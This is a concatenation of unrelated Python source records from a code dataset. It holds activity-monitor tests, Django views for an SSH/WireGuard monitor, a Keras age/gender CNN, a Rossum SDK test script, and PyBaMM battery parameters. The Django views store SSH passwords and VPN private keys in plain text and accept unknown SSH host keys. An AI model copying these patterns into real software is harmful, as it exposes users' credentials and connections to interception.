'youtube.com', 'opera')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n 
assert len(app1.instances) == 1\n assert len(app1.instances[0].timestamps) == 2\n assert app1.instances[0].totalTime == 40\n\n assert len(app2.instances[0].timestamps) == 1\n assert app2.instances[0].totalTime == 30\n\n\ndef test_AWI_updateBasedOnOtherAppDifferentIsntances():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 'howtostaycool.com', 'opera')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n assert len(app1.instances) == 2\n assert len(app1.instances[0].timestamps) == 1\n assert len(app1.instances[1].timestamps) == 1\n assert app1.instances[0].totalTime == 10\n assert app1.instances[1].totalTime == 30\n\n assert len(app2.instances) == 1\n assert len(app2.instances[0].timestamps) == 1\n\n\ndef test_AWI_updateBasedOnOtherAppDifferentAppName():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 'youtube.com', 'chrome')\n\n # act\n app1.updateBasedOnOther(app2)\n\n # assert\n assert len(app1.instances) == 1\n assert len(app1.instances[0].timestamps) == 1\n\n assert len(app2.instances) == 1\n assert len(app2.instances[0].timestamps) == 1\n\ndef test_AWI_sumOfTotalTimeForApplication():\n # arrange\n timestamp = [([20, 0, 0], [20, 0, 10]), ([19, 0, 0], [19, 0, 10])]\n app = Hlp.createBasicApp(timestamp, 'youtube.com', 'opera')\n\n # act\n calculatedTime = app.sumOfTotalTimeForApplication()\n expectedTime = 0\n for tup in timestamp:\n for number in range(len(tup[0])):\n expectedTime += tup[1][number] - tup[0][number]\n\n # assert\n assert calculatedTime == expectedTime\n","repo_name":"Barud21/ActivityMonitor","sub_path":"tests/test_ApplicationObjects.py","file_name":"test_ApplicationObjects.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} 
+{"seq_id":"9277932086","text":"# -*- encoding: utf-8 -*-\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout, update_session_auth_hash\nfrom django import template\nfrom django.contrib.auth.hashers import make_password\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template import loader\nfrom django.urls import reverse\nfrom monitor.forms import *\nfrom monitor.models import *\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom datetime import datetime, date, timedelta\nfrom django.contrib.auth.models import Group\nfrom django.utils.timezone import utc\nimport datetime\nimport paramiko\nfrom django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.contrib.auth import views as auth_views\nfrom django.utils.crypto import get_random_string\nfrom utilidades.funciones import ejecutar_comando_remoto, prueba_conexion, cliente_monitor\n## correo ##\nfrom django.core.mail import EmailMessage, send_mail, EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom asgiref.sync import sync_to_async\nimport asyncio\n## correo ##\n\n\n@login_required(login_url='login')\ndef conexiones_ssh(request):\n user = request.user.id\n datos = Ssh_connect.objects.filter(user_creator__exact=user)\n return render(request,'monitor/pages/connect-ssh.html',{'datos':datos})\n\n@login_required(login_url='login')\ndef add_ssh(request):\n user_auth = request.user.id\n if request.method == \"POST\":\n form = Formulario_ssh(request.POST)\n if form.is_valid():\n data = form.cleaned_data \n nombre = data['nombre']\n user = data['user']\n ipHost = data['ipHost']\n puerto 
= data['puerto']\n passwd = data['passwd']\n obj_model= Ssh_connect()\n obj_model.user_creator = user_auth\n obj_model.nombre = nombre\n obj_model.user = user\n obj_model.ipHost = ipHost\n obj_model.puerto = puerto\n obj_model.passwd = passwd\n obj_model.save()\n return redirect(\"/\")\n else: \n messages.add_message(request,messages.WARNING, \"Error en el formulario\")\n \n else:\n form = Formulario_ssh() \n \n return render(request,'monitor/pages/add-ssh.html',{'form':form})\n\n\n\n@login_required(login_url='login')\ndef estado_ssh(request, id):\n estado = None\n model = Ssh_connect.objects.filter(id__exact = id)\n objmodel = model.first()\n ssh_client = paramiko.SSHClient()\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n ssh_client.connect(f'{objmodel.ipHost}', username=f'{objmodel.user}', password=f'{objmodel.passwd}', port=f'{objmodel.puerto}')\n ssh_client.close() \n estado = True\n\n except:\n messages.add_message(request,messages.WARNING, \"Error de conexión con el host\")\n estado = False\n \n \n return render(request,'monitor/pages/connect-ssh.html',{'estado':estado,'datos':model})\n\n@login_required(login_url='login')\ndef monitor_vpn(request, id):\n peer_model = Peer_monitor.objects.all().delete()\n cliente = {}\n try:\n output = ejecutar_comando_remoto(id,\"wg show\") \n lines = output.strip().split('\\n')\n for line in lines: \n if \"peer\" in line:\n peer = line.split(':')[1].strip() \n cliente['peer'] = peer \n elif \"endpoint\" in line:\n endpoint = line.split(':')[1].strip()\n cliente['endpoint'] = endpoint \n elif \"allowed ips\" in line:\n allowed = line.split(':')[1].strip()\n cliente['allowed_ips'] = allowed\n elif \"latest handshake\" in line:\n latest = line.split(':')[1].strip()\n cliente['latest_handshake'] = latest\n elif \"transfer\" in line:\n transfer = line.split(':')[1].strip()\n cliente['transfer'] = transfer \n \n create = Peer_monitor.objects.create(publicKey = cliente['peer'],endpoint = 
cliente['endpoint'], transfer = cliente['transfer'], latest_handshake = cliente['latest_handshake'],allowedIps=cliente['allowed_ips']) \n except:\n messages.add_message(request,messages.WARNING, \"Error de conexión con el host\")\n return HttpResponseRedirect('/')\n \n peer_model = Peer_monitor.objects.all()\n\n return render(request,'monitor/pages/monitor-vpn.html',{'peer':peer_model})\n\n@login_required(login_url='login')\ndef add_vpn_server(request):\n user_auth = request.user.id\n if request.method == \"POST\":\n form = Vpn_serverForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data \n nombre = data['nombre']\n publicKey = data['publicKey']\n privateKey = data['privateKey']\n ip_address = data['ip_address']\n puerto = data['puerto']\n obj_model= Peer_server()\n obj_model.user_creator = user_auth\n obj_model.nombre = nombre\n obj_model.publicKey = publicKey\n obj_model.privateKey = privateKey\n obj_model.ip_address = ip_address\n obj_model.puerto = puerto\n obj_model.save()\n return redirect(\"/\")\n else: \n messages.add_message(request,messages.WARNING, \"Error en el formulario\")\n \n else:\n form = Vpn_serverForm() \n \n return render(request,'monitor/pages/add-vpn-server.html',{'form':form})","repo_name":"Godleveleo/wiremonitor","sub_path":"core/monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14148957183","text":"import os\nimport numpy as np\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport utils as myutils\n\n\nclass AgeGenderModel(object):\n def __init__(self, model_variables, variables, database):\n self.MV = model_variables\n self.Vars = variables\n self.DB = database\n self.model = None\n 
self.weight_save_path = \"saved_weights\"\n self.outputs_path = \"outputs\"\n self.model_name = self.Vars[\"name\"]\n\n if self.Vars[\"class\"] == \"age\":\n self.model_class = \"age\"\n self.class_count = self.DB.age_class_count\n self.class_labels = self.DB.age_labels\n self.db_train_path = self.DB.db_age_train_folder_path\n self.db_test_path = self.DB.db_age_test_folder_path\n self.mean_image = myutils.load_image( self.DB.age_mean_image_path )\n elif self.Vars[\"class\"] == \"sex\":\n self.model_class = \"sex\"\n self.class_count = self.DB.sex_class_count\n self.class_labels = self.DB.sex_labels\n self.db_train_path = self.DB.db_sex_train_folder_path\n self.db_test_path = self.DB.db_sex_test_folder_path\n self.mean_image = myutils.load_image( self.DB.sex_mean_image_path )\n\n self.class_weights = myutils.load_obj(\n self.DB.db_new_path + \"/\" + self.model_class)\n\n def create_model(self):\n self.model = Sequential([\n Conv2D(\n self.MV[\"conv1\"][\"filter_size\"],\n tuple(self.MV[\"conv1\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv1\"][\"stride\"]),\n padding=self.MV[\"conv1\"][\"padding\"],\n bias_initializer=self.MV[\"conv1\"][\"bias\"],\n activation='relu',\n input_shape=self.DB.input_shape),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool1\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool1\"][\"stride\"]),\n padding=self.MV[\"pool1\"][\"padding\"]),\n\n # Used batch normalization instead of local response normalization\n BatchNormalization(),\n Conv2D(\n self.MV[\"conv2\"][\"filter_size\"],\n tuple(self.MV[\"conv2\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv2\"][\"stride\"]),\n padding=self.MV[\"conv2\"][\"padding\"],\n bias_initializer=self.MV[\"conv2\"][\"bias\"],\n activation='relu'),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool2\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool2\"][\"stride\"]),\n padding=self.MV[\"pool2\"][\"padding\"]),\n\n # Used batch normalization instead of local response normalization\n 
BatchNormalization(),\n Conv2D(\n self.MV[\"conv3\"][\"filter_size\"],\n tuple(self.MV[\"conv3\"][\"kernel_size\"]),\n strides=tuple(self.MV[\"conv3\"][\"stride\"]),\n padding=self.MV[\"conv3\"][\"padding\"],\n bias_initializer=self.MV[\"conv3\"][\"bias\"],\n activation='relu'),\n MaxPooling2D(\n pool_size=tuple(self.MV[\"pool3\"][\"pool_shape\"]),\n strides=tuple(self.MV[\"pool3\"][\"stride\"]),\n padding=self.MV[\"pool3\"][\"padding\"]),\n Flatten(),\n Dense(\n self.MV[\"dense1\"], bias_initializer=\"ones\", activation='relu'),\n Dropout(self.MV[\"drop1\"]),\n Dense(\n self.MV[\"dense2\"], bias_initializer=\"ones\", activation='relu'),\n Dropout(self.MV[\"drop2\"]),\n Dense(\n self.class_count,\n bias_initializer=\"ones\",\n activation='softmax')\n ])\n\n adam = Adam(lr=self.MV[\"learning_rate\"], decay=self.MV[\"decay\"])\n\n self.model.compile(\n loss='categorical_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n def init_image_data_generators(self):\n self.train_idgen = ImageDataGenerator(\n featurewise_center=True,\n rescale=1. / 255,\n rotation_range=10,\n height_shift_range=0.10,\n width_shift_range=0.10,\n horizontal_flip=True)\n\n self.test_idgen = ImageDataGenerator(\n rescale=1. 
/ 255,\n featurewise_center=True)\n \n mean_img_norm = np.asarray(self.mean_image,np.float32)\n mean_img_norm /= 255 \n self.train_idgen.mean = mean_img_norm\n self.test_idgen.mean = mean_img_norm\n\n self.train_idgen_flow = self.train_idgen.flow_from_directory(\n self.db_train_path,\n classes=self.class_labels,\n target_size=(int(self.Vars[\"img_in_height\"]),\n int(self.Vars[\"img_in_width\"])),\n batch_size=int(self.Vars[\"batch_size\"]),\n class_mode='categorical',\n shuffle=True)\n\n self.test_idgen_flow = self.test_idgen.flow_from_directory(\n self.db_test_path,\n classes=self.class_labels,\n target_size=(int(self.Vars[\"img_in_height\"]),\n int(self.Vars[\"img_in_width\"])),\n batch_size=int(self.Vars[\"batch_size\"]),\n class_mode='categorical')\n\n def train(self):\n self.model.fit_generator(\n self.train_idgen_flow,\n steps_per_epoch=self.train_idgen_flow.n //\n self.train_idgen_flow.batch_size,\n epochs=int(self.Vars[\"epoch\"]),\n class_weight=self.class_weights,\n# validation_data=self.test_idgen_flow,\n# validation_steps= self.test_idgen_flow.n//self.test_idgen_flow.batch_size ,\n workers=1,\n verbose=2)\n\n def test(self):\n self.test_idgen_flow.reset()\n score = self.model.evaluate_generator(\n self.test_idgen_flow,\n self.test_idgen_flow.n // self.test_idgen_flow.batch_size)\n print(\"Test Score\") \n print(\"Loss: {:.3f}\\tAccuracy: {:.3f}\".format(score[0], score[1]))\n\n def predict_test(self):\n self.test_idgen_flow.reset()\n predictions = np.empty(shape=[0, self.class_count])\n true_classes = np.empty(shape=[0, self.class_count])\n for i in range(self.test_idgen_flow.n//self.test_idgen_flow.batch_size):\n X_batch , Y_batch = self.test_idgen_flow.next()\n preds= self.model.predict(X_batch,batch_size=self.test_idgen_flow.batch_size)\n \n true_classes = np.append(true_classes, Y_batch, axis=0)\n predictions = np.append(predictions, preds, axis=0)\n \n return predictions,true_classes\n\n def save_model_weights(self):\n if not 
os.path.exists(self.weight_save_path):\n os.makedirs(self.weight_save_path)\n path = self.weight_save_path + \"/\" + self.Vars[\"name\"] + \".h5\"\n self.model.save_weights(path)\n\n def load_model_weights(self):\n path = self.weight_save_path + \"/\" + self.Vars[\"name\"] + \".h5\"\n self.model.load_weights(path)\n\n\ndef print_preds(agm, predictions, true_values, accuracy, my_accuracy, f1sc):\n from utils import log_preds\n log_preds(\n \"Path\\t\\t\\t\\t True Class\\t Predicted Class\\tACCURACY = {:.3f}\\tMY ACCURACY = {:.3f}\\tF1 Score = {:.3f}\".\n format(accuracy, my_accuracy, f1sc), agm.model_name)\n for i in range(len(predictions)):\n\n log_str = \"{}\\t {}\\t\".format(agm.test_idgen_flow.filenames[i],\n true_values[i])\n for j in range(len(predictions[0]) - 1):\n log_str += \"{:.2f}\\t\".format(predictions[i][j])\n log_str += \"{:.2f}\".format(predictions[i][len(predictions[0]) - 1])\n log_preds(log_str, agm.model_name)\n\n\n# Just for debug\n#from keras.preprocessing.image import ImageDataGenerator\n#import numpy as np\n#\n#train_idgen = ImageDataGenerator(\n# featurewise_std_normalization=True\n# ,rescale=1. / 255\n# ,shear_range=0.10\n# ,rotation_range=20\n# ,height_shift_range=0.10\n# ,width_shift_range=0.10\n# ,horizontal_flip=True\n# )\n#\n#sample_data_gen_flow = ImageDataGenerator(rescale= 1. 
/255).flow_from_directory(\n# \"DB/age/train\",\n# target_size=(227,227),\n# batch_size= 64,\n# class_mode='categorical',\n# shuffle=True)\n#\n#X , _ = sample_data_gen_flow.next()\n#for i in range( 1000 // 64 ):\n# X2 , _ = sample_data_gen_flow.next()\n# X = np.append(X,X2, axis=0)\n#\n#train_idgen.fit(X)\n#\n#train_idgen_flow = train_idgen.flow_from_directory(\n# \"DB/age/train\",\n# target_size=(227,227),\n# batch_size=64,\n# class_mode='categorical'\n# ,save_to_dir=\"outputs\\\\aug_train\"\n# )\n#train_idgen_flow.next()\n#train_idgen_flow.reset()\n","repo_name":"ferhatminder/Age-and-Gender-Classification-Using-CNN-Keras","sub_path":"age_gender_model.py","file_name":"age_gender_model.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"12306352832","text":"\"\"\"A script that tests all operations over a single resource provided by Elis API.\n\nIt could evolve in time into an E2E test.\n\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nimport logging\nimport os\nimport random\n\nimport aiofiles\n\nfrom rossum_api import ElisAPIClient, ElisAPIClientSync\nfrom rossum_api.api_client import APIClient\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\nWORKSPACE = {\n \"name\": \"Rossum Client NG Test\",\n \"organization\": \"https://elis.develop.r8.lol/api/v1/organizations/167\",\n}\n\nSCHEMA = {\n \"id\": 31336,\n \"name\": \"Rossum NG Test Schema\",\n \"queues\": [\"https://elis.rossum.ai/api/v1/queues/8236\"],\n \"url\": \"https://elis.rossum.ai/api/v1/schemas/31336\",\n \"content\": [\n {\n \"category\": \"section\",\n \"id\": \"invoice_details_section\",\n \"label\": \"Invoice details\",\n \"children\": [\n {\n \"category\": \"datapoint\",\n \"id\": \"document_id\",\n \"label\": \"Invoice number\",\n \"type\": \"string\",\n \"rir_field_names\": [\"document_id\"],\n \"constraints\": {\"required\": False},\n \"default_value\": 
None,\n },\n ],\n },\n ],\n \"metadata\": {},\n}\n\n\nasync def main():\n client = APIClient(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n workspace = await client.create(\"workspaces\", data=WORKSPACE)\n response = await client.fetch_one(\"workspaces\", id_=workspace[\"id\"])\n print(\"GET result:\", response)\n print(\"LIST results:\")\n async for w in client.fetch_all(\"workspaces\", ordering=[\"-id\"], name=WORKSPACE[\"name\"]):\n print(w)\n response = await client.replace(\n \"workspaces\",\n id_=workspace[\"id\"],\n data={**WORKSPACE, \"name\": WORKSPACE[\"name\"]},\n )\n print(\"PUT result:\", response)\n response = await client.update(\n \"workspaces\",\n id_=workspace[\"id\"],\n data={\"name\": f\"{WORKSPACE['name']} {random.randint(1, 100)}\"},\n )\n print(\"PATCH result:\", response)\n\n # Upload a document -- schema and queue must be created to do that\n schema = await client.create(\"schemas\", data=SCHEMA)\n queue = await client.create(\n \"queues\",\n data={\n \"workspace\": workspace[\"url\"],\n \"name\": \"Rossum Client NG Test\",\n \"schema\": schema[\"url\"],\n },\n )\n\n async with aiofiles.open(\"tests/data/sample_invoice.pdf\", \"rb\") as fp:\n response = await client.upload(\n \"queues\",\n id_=queue[\"id\"],\n fp=fp,\n filename=\"filename.pdf\",\n values={\"upload:organization_unit\": \"Sales\"},\n metadata={\"project\": \"Market ABC\"},\n )\n print(\"UPLOAD result:\", response)\n\n print(\"EXPORT result:\")\n async for chunk in client.export(\n \"queues\",\n id_=queue[\"id\"],\n export_format=\"xml\",\n page_size=200,\n columns=[\"meta_file_name\", \"document_id\", \"status\"],\n ):\n print(chunk)\n\n response = await client.delete(\"workspaces\", id_=workspace[\"id\"])\n print(f\"Workspace {workspace['id']} deleted.\")\n\n\nasync def main_with_async_client():\n client = ElisAPIClient(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n 
base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n workspace = await client.create_new_workspace(data=WORKSPACE)\n workspace = await client.retrieve_workspace(workspace.id)\n print(\"GET result:\", workspace)\n print(\"LIST results:\")\n async for w in client.list_all_workspaces([\"-id\"], None, name=WORKSPACE[\"name\"]):\n print(w)\n\n schema = await client.create_new_schema(SCHEMA)\n queue = await client.create_new_queue(\n {\"workspace\": workspace.url, \"name\": \"Rossum Client NG Test\", \"schema\": schema.url}\n )\n (annotation_id,) = await client.import_document(\n queue.id, [(\"tests/data/sample_invoice.pdf\", \"Sample Invoice\")]\n )\n\n print(\"Polling until annotation is ready to review...\")\n annotation = await client.poll_annotation(annotation_id, lambda a: a.status != \"importing\")\n print(f\"Annotation ready to review: {annotation}\")\n\n # Cleanup\n await client.delete_queue(queue.id)\n print(f\"Workspace {workspace.id} deleted.\")\n await client.delete_workspace(workspace.id)\n print(f\"Workspace {workspace.id} deleted.\")\n\n\ndef main_with_sync_client():\n client = ElisAPIClientSync(\n os.environ[\"ELIS_USERNAME\"],\n os.environ[\"ELIS_PASSWORD\"],\n base_url=\"https://elis.develop.r8.lol/api/v1\",\n )\n ws = client.create_new_workspace(data=WORKSPACE)\n workspace_id = ws.id\n ws = client.retrieve_workspace(workspace_id)\n print(\"GET result:\", ws)\n print(\"LIST results:\")\n for w in client.list_all_workspaces([\"-id\"], None, name=WORKSPACE[\"name\"]):\n print(w)\n client.delete_workspace(workspace_id)\n print(f\"Workspace {workspace_id} deleted.\")\n\n\nasyncio.run(main())\n# asyncio.run(main_with_async_client())\n# main_with_sync_client()\n","repo_name":"rossumai/rossum-sdk","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"29429733525","text":"#\n# Standard parameters for lithium-ion battery 
models\n#\n\"\"\"\nStandard parameters for lithium-ion battery models\n\"\"\"\nimport pybamm\nimport numpy as np\nfrom scipy import constants\n\n\n# --------------------------------------------------------------------------------------\n\"File Layout:\"\n# 1. Dimensional Parameters\n# 2. Dimensional Functions\n# 3. Scalings\n# 4. Dimensionless Parameters\n# 5. Dimensionless Functions\n# 6. Input Current\n\n# --------------------------------------------------------------------------------------\n\"1. Dimensional Parameters\"\n\n# Physical constants\nR = pybamm.Scalar(8.3144621)\n# R = pybamm.Scalar(constants.R)\n# F = pybamm.Scalar(constants.physical_constants[\"Faraday constant\"][0])\nF = pybamm.Scalar(96485.3365)\nT_ref = pybamm.Parameter(\"Reference temperature [K]\")\n\n# Macroscale geometry\nL_cn = pybamm.geometric_parameters.L_cn\nL_n = pybamm.geometric_parameters.L_n\nL_s = pybamm.geometric_parameters.L_s\nL_p = pybamm.geometric_parameters.L_p\nL_cp = pybamm.geometric_parameters.L_cp\nL_x = pybamm.geometric_parameters.L_x\nL_y = pybamm.geometric_parameters.L_y\nL_z = pybamm.geometric_parameters.L_z\nL = pybamm.geometric_parameters.L\nA_cc = pybamm.geometric_parameters.A_cc\n\n# Tab geometry\nL_tab_n = pybamm.geometric_parameters.L_tab_n\nCentre_y_tab_n = pybamm.geometric_parameters.Centre_y_tab_n\nCentre_z_tab_n = pybamm.geometric_parameters.Centre_z_tab_n\nL_tab_p = pybamm.geometric_parameters.L_tab_p\nCentre_y_tab_p = pybamm.geometric_parameters.Centre_y_tab_p\nCentre_z_tab_p = pybamm.geometric_parameters.Centre_z_tab_p\nA_tab_n = pybamm.geometric_parameters.A_tab_n\nA_tab_p = pybamm.geometric_parameters.A_tab_p\n\n# Electrical\nI_typ = pybamm.electrical_parameters.I_typ\nQ = pybamm.electrical_parameters.Q\nC_rate = pybamm.electrical_parameters.C_rate\nn_electrodes_parallel = pybamm.electrical_parameters.n_electrodes_parallel\ni_typ = pybamm.electrical_parameters.i_typ\nvoltage_low_cut_dimensional = 
pybamm.electrical_parameters.voltage_low_cut_dimensional\nvoltage_high_cut_dimensional = pybamm.electrical_parameters.voltage_high_cut_dimensional\n\n# Electrolyte properties\nc_e_typ = pybamm.Parameter(\"Typical electrolyte concentration [mol.m-3]\")\n\n# Electrode properties\nc_n_max = pybamm.Parameter(\"Maximum concentration in negative electrode [mol.m-3]\")\nc_p_max = pybamm.Parameter(\"Maximum concentration in positive electrode [mol.m-3]\")\nsigma_cn_dimensional = pybamm.Parameter(\n \"Negative current collector conductivity [S.m-1]\"\n)\nsigma_n_dim = pybamm.Parameter(\"Negative electrode conductivity [S.m-1]\")\nsigma_p_dim = pybamm.Parameter(\"Positive electrode conductivity [S.m-1]\")\nsigma_cp_dimensional = pybamm.Parameter(\n \"Positive current collector conductivity [S.m-1]\"\n)\n\n# Microscale geometry\na_n_dim = pybamm.geometric_parameters.a_n_dim\na_p_dim = pybamm.geometric_parameters.a_p_dim\na_k_dim = pybamm.Concatenation(\n pybamm.FullBroadcast(a_n_dim, [\"negative electrode\"], \"current collector\"),\n pybamm.FullBroadcast(0, [\"separator\"], \"current collector\"),\n pybamm.FullBroadcast(a_p_dim, [\"positive electrode\"], \"current collector\"),\n)\nR_n = pybamm.geometric_parameters.R_n\nR_p = pybamm.geometric_parameters.R_p\nb_e_n = pybamm.geometric_parameters.b_e_n\nb_e_s = pybamm.geometric_parameters.b_e_s\nb_e_p = pybamm.geometric_parameters.b_e_p\nb_s_n = pybamm.geometric_parameters.b_s_n\nb_s_s = pybamm.geometric_parameters.b_s_s\nb_s_p = pybamm.geometric_parameters.b_s_p\n\n# Electrochemical reactions\nne_n = pybamm.Parameter(\"Negative electrode electrons in reaction\")\nne_p = pybamm.Parameter(\"Positive electrode electrons in reaction\")\nC_dl_dimensional = pybamm.Parameter(\"Double-layer capacity [F.m-2]\")\n\n\n# Initial conditions\nc_e_init_dimensional = pybamm.Parameter(\n \"Initial concentration in electrolyte [mol.m-3]\"\n)\nc_n_init_dimensional = pybamm.Parameter(\n \"Initial concentration in negative electrode 
[mol.m-3]\"\n)\nc_p_init_dimensional = pybamm.Parameter(\n \"Initial concentration in positive electrode [mol.m-3]\"\n)\n\n# thermal\nDelta_T = pybamm.thermal_parameters.Delta_T\nthermal_voltage = R * T_ref / F\n\n# Activation energies\nE_r_n = pybamm.thermal_parameters.E_r_n\nE_r_p = pybamm.thermal_parameters.E_r_p\nE_D_s_n = pybamm.thermal_parameters.E_D_s_n\nE_D_s_p = pybamm.thermal_parameters.E_D_s_p\nE_D_e = pybamm.thermal_parameters.E_D_e\nE_k_e = pybamm.thermal_parameters.E_k_e\n\n# velocity scale\nvelocity_scale = pybamm.Scalar(1)\n\n# --------------------------------------------------------------------------------------\n\"2. Dimensional Functions\"\n\n\ndef D_e_dimensional(c_e, T):\n \"Dimensional diffusivity in electrolyte\"\n return pybamm.FunctionParameter(\n \"Electrolyte diffusivity [m2.s-1]\", c_e, T, T_ref, E_D_e, R\n )\n\n\ndef kappa_e_dimensional(c_e, T):\n \"Dimensional electrolyte conductivity\"\n return pybamm.FunctionParameter(\n \"Electrolyte conductivity [S.m-1]\", c_e, T, T_ref, E_k_e, R\n )\n\n\ndef D_n_dimensional(c_n, T):\n \"Dimensional diffusivity in negative particle\"\n return pybamm.FunctionParameter(\n \"Negative electrode diffusivity [m2.s-1]\", c_n, T, T_ref, E_D_s_n, R\n )\n\n\ndef D_p_dimensional(c_p, T):\n \"Dimensional diffusivity in positive particle\"\n return pybamm.FunctionParameter(\n \"Positive electrode diffusivity [m2.s-1]\", c_p, T, T_ref, E_D_s_p, R\n )\n\n\ndef m_n_dimensional(T):\n \"Dimensional negative reaction rate\"\n return pybamm.FunctionParameter(\n \"Negative electrode reaction rate\", T, T_ref, E_r_n, R\n )\n\n\ndef m_p_dimensional(T):\n \"Dimensional negative reaction rate\"\n return pybamm.FunctionParameter(\n \"Positive electrode reaction rate\", T, T_ref, E_r_p, R\n )\n\n\ndef dUdT_n_dimensional(sto):\n \"\"\"\n Dimensional entropic change of the negative electrode open-circuit potential [V.K-1]\n \"\"\"\n return pybamm.FunctionParameter(\n \"Negative electrode OCP entropic change [V.K-1]\", sto, 
c_n_max\n )\n\n\ndef dUdT_p_dimensional(sto):\n \"\"\"\n Dimensional entropic change of the positive electrode open-circuit potential [V.K-1]\n \"\"\"\n return pybamm.FunctionParameter(\n \"Positive electrode OCP entropic change [V.K-1]\", sto, c_p_max\n )\n\n\ndef U_n_dimensional(sto, T):\n \"Dimensional open-circuit potential in the negative electrode [V]\"\n u_ref = pybamm.FunctionParameter(\"Negative electrode OCP [V]\", sto)\n return u_ref + (T - T_ref) * dUdT_n_dimensional(sto)\n\n\ndef U_p_dimensional(sto, T):\n \"Dimensional open-circuit potential in the positive electrode [V]\"\n u_ref = pybamm.FunctionParameter(\"Positive electrode OCP [V]\", sto)\n return u_ref + (T - T_ref) * dUdT_p_dimensional(sto)\n\n\n# can maybe improve ref value at some stage\nU_n_ref = U_n_dimensional(c_n_init_dimensional / c_n_max, T_ref)\n\n# can maybe improve ref value at some stage\nU_p_ref = U_p_dimensional(c_p_init_dimensional / c_p_max, T_ref)\n\nm_n_ref_dimensional = m_n_dimensional(T_ref)\nm_p_ref_dimensional = m_p_dimensional(T_ref)\n\n# -------------------------------------------------------------------------------------\n\"3. 
Scales\"\n# concentration\nelectrolyte_concentration_scale = c_e_typ\nnegative_particle_concentration_scale = c_n_max\npositive_particle_concentration_scale = c_p_max\n\n# electrical\npotential_scale = R * T_ref / F\ncurrent_scale = i_typ\ninterfacial_current_scale_n = i_typ / (a_n_dim * L_x)\ninterfacial_current_scale_p = i_typ / (a_p_dim * L_x)\n\n# Discharge timescale\ntau_discharge = F * c_n_max * L_x / i_typ\n\n# Reaction timescales\ntau_r_n = F / (m_n_ref_dimensional * a_n_dim * c_e_typ ** 0.5)\ntau_r_p = F / (m_p_ref_dimensional * a_p_dim * c_e_typ ** 0.5)\n\n# Electrolyte diffusion timescale\ntau_diffusion_e = L_x ** 2 / D_e_dimensional(c_e_typ, T_ref)\n\n# Particle diffusion timescales\ntau_diffusion_n = R_n ** 2 / D_n_dimensional(c_n_max, T_ref)\ntau_diffusion_p = R_p ** 2 / D_p_dimensional(c_p_max, T_ref)\n\n# Thermal diffusion timescale\ntau_th_yz = pybamm.thermal_parameters.tau_th_yz\n\n# --------------------------------------------------------------------------------------\n\"4. 
Dimensionless Parameters\"\n# Timescale ratios\nC_n = tau_diffusion_n / tau_discharge\nC_p = tau_diffusion_p / tau_discharge\nC_e = tau_diffusion_e / tau_discharge\nC_r_n = tau_r_n / tau_discharge\nC_r_p = tau_r_p / tau_discharge\nC_th = tau_th_yz / tau_discharge\n\n# Concentration ratios\ngamma_e = c_e_typ / c_n_max\ngamma_p = c_p_max / c_n_max\n\n# Macroscale Geometry\nl_cn = pybamm.geometric_parameters.l_cn\nl_n = pybamm.geometric_parameters.l_n\nl_s = pybamm.geometric_parameters.l_s\nl_p = pybamm.geometric_parameters.l_p\nl_cp = pybamm.geometric_parameters.l_cp\nl_x = pybamm.geometric_parameters.l_x\nl_y = pybamm.geometric_parameters.l_y\nl_z = pybamm.geometric_parameters.l_z\na_cc = pybamm.geometric_parameters.a_cc\nl = pybamm.geometric_parameters.l\ndelta = pybamm.geometric_parameters.delta\n\n# Tab geometry\nl_tab_n = pybamm.geometric_parameters.l_tab_n\ncentre_y_tab_n = pybamm.geometric_parameters.centre_y_tab_n\ncentre_z_tab_n = pybamm.geometric_parameters.centre_z_tab_n\nl_tab_p = pybamm.geometric_parameters.l_tab_p\ncentre_y_tab_p = pybamm.geometric_parameters.centre_y_tab_p\ncentre_z_tab_p = pybamm.geometric_parameters.centre_z_tab_p\n\n# Microscale geometry\nepsilon_n = pybamm.Parameter(\"Negative electrode porosity\")\nepsilon_s = 